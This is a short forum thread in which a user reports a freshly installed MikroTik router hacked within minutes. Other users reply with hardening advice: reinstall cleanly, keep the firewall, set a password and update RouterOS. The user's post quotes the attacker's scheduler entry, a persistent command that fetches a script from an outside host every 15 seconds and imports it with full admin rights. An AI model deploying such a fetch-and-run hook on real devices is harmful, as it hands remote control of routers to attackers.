Routerboard Hacked question

sewlist · December 12, 2018, 1:06pm

Hi Guys

My installer installed a new router, and 5mins later before we could upgrade it was hacked

Only thing we saw that was changed was this scheduler added

Does anyone know what this mean

0 X name=“U6” start-time=startup interval=15s on-event=/tool fetch url=http://fanmusic.xyz/poll/25e93549-c1a1-42f0-bef2-8e05bb514ab6 mode=http dst-path=7wmp0b4swouv\r\n/import 7wmp0b4swouv owner=“admin” policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive run-count=0

S

normis · December 12, 2018, 1:08pm

why don’t you check the contents of that new file, that this scheduler downloaded ? it’s in the files section now.

I suggest Netinstalling the device, and never give access to your device from the internet, where is your firewall ?

mistry7 · December 12, 2018, 1:09pm

Forgot to set Admin pass ???
Use newest ROS!

sewlist · December 12, 2018, 1:12pm

Agree with all of you, Rookie error from my teams

We will reinstall router clean

S

normis · December 12, 2018, 1:13pm

Yes.

Used old RouterOS
Removed the default firewall
Forgot to set password
Connnected it to the internet without any firewall

No need to hack anything, just begging for trouble.